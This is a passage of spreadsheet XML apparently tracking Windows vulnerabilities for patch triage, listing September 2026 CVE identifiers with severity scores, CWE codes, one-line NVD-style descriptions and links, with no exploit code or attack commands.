      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K379" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69418</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69418</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69423</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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1" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69427</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69427</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69458</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows BitLocker allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69458</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69462</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69462</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69481</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Enterprise App Management allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69481</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69503</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K38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86" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69505</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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7" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69512</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S388" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69512</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69619</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows exFAT File System allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69619</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69623</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S390" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69623</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69625</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S391" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69625</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69643</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69643</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69681</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69681</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69689</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="S394" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69689</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69714</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69714</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69717</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-822, CWE-843</t>
        </is>
      </c>
      <c r="S396" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Group Policy allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T396" s="6" t="inlineStr">
